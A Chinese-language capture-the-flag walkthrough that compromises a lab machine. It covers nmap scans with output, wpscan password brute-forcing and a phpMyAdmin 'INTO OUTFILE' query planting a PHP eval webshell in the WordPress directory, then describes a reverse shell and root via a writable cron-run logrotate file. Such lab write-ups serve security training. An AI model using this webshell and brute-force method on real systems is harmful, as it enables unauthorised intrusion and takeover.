信息收集
# nmap -sn 192.168.1.0/24 -oN live.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-08 11:22 CST
Nmap scan report for 192.168.1.1
Host is up (0.00037s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00028s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.105
Host is up (0.00030s latency).
MAC Address: 00:0C:29:D9:B7:22 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00025s latency).
MAC Address: 00:50:56:E6:68:F1 (VMware)
Nmap scan report for 192.168.1.60
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.08 seconds
IP地址为192.168.1.105是新增加的地址,判断为靶机的IP地址
# nmap -sT --min-rate 10000 -p- 192.168.1.105 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-08 11:22 CST
Nmap scan report for 192.168.1.105
Host is up (0.00036s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:D9:B7:22 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds
仅开放一个80端口,那就需要在80端口上getshell!
# nmap -sT -sC -sV -O -p80 192.168.1.105 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-08 11:23 CST
Nmap scan report for 192.168.1.105
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:D9:B7:22 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
80端口上的HTTP服务是由Apache 2.4.25起的服务 Debian的操作系统 没什么其他的信息
# nmap -sT --script=vuln -p80 192.168.1.105 -oN vuln.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-08 11:23 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.105
Host is up (0.00031s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.105
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.105:80/manual/de/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/pt-br/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/es/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/en/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/zh-cn/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/ko/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/da/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/tr/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/fr/index.html
| Form id:
| Form action: http://www.google.com/search
|
| Path: http://192.168.1.105:80/manual/ja/index.html
| Form id:
|_ Form action: http://www.google.com/search
| http-enum:
| /wordpress/: Blog
| /phpmyadmin/: phpMyAdmin
| /wordpress/wp-login.php: Wordpress login page.
|_ /manual/: Potentially interesting folder
MAC Address: 00:0C:29:D9:B7:22 (VMware)
看到了存在一个目录是wordpress和PHPmyadmin!没什么其他的漏洞信息!
寻找立足点
尝试访问一下80端口上的信息:
尝试访问就是apache的默认界面,访问一下wordpress的界面:
wordpress的资源太多,无法完整的看到界面,还有phpmyadmin也尝试访问一下:
尝试访问了一下,试了几个弱口令,但是没能成功!还是先在80端口上寻找突破点!利用wpscan进行初步的wordpress的信息探测!
发现存在两个用户:lemon 和 orange!换了一个浏览器,发现了:
尝试爆破了wordpress的登陆界面以及phpmyadmin的登陆界面,均没有什么突破!
sql注入的话,感觉search界面也没有~
尝试直接使用wpscan进行密码的枚举:
wpscan --url http://192.168.1.105/wordpress -e u -P /usr/share/wordlists/rockyou.txt
很快就得到了一个密码,这里我就没有继续去探测lemon的密码了,rockyou的字典数量实在是太大了!登录wordpress!发现没有插件等!
但是发现了一串奇怪的字符!尝试phpmyadmin进行登录,发现成功了!看了一下数据库中的wp_user表!发现了里面存在lemon的加密密码,但是解密失败了!
直接尝试phpmyadmin!getshell! 先看看into outfile方法!
查看mysql的安装目录:
select @@basedir; 查找mysql安装路径
show global variables like '%secure_file_priv%';
NULL 不允许导入或导出
/tmp 只允许在 /tmp 目录导入导出
空 不限制目录
如果有权限
select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/var/www/html/shell.php'
但是没有权限去写入文件!
尝试像wordpress目录下面去写文件试试:
成功了,访问一下看看!
没问题执行成功!准备提权了!
提权
执行利用这个马建立反弹shell吧:
当前没有sudo;查看存在的suid文件,发现了:
存在pkexec,暂时先不利用;继续看其他的!
查看/etc/passwd文件,看到了存在orange用户,不知道是不是上面的两个密码,尝试切换用户试一下:
n0t1n@w0rdl1st!
ginger
两个密码都不对~ 后面上传了linpeas,发现了user.txt文件:
音乐可以改变你的生活,暂时不知道这个提示有什么用!查看定时任务:
也没什么发现,看到了etc/crontab里面存在logrotate!
发现这个文件是777的权限!那就直接写提权代码到这个文件中,利用定时任务进行提权!
写入之后,起一个监听:
最终通过定时任务收到会话,查看flag文件!
最终读取到了flag文件!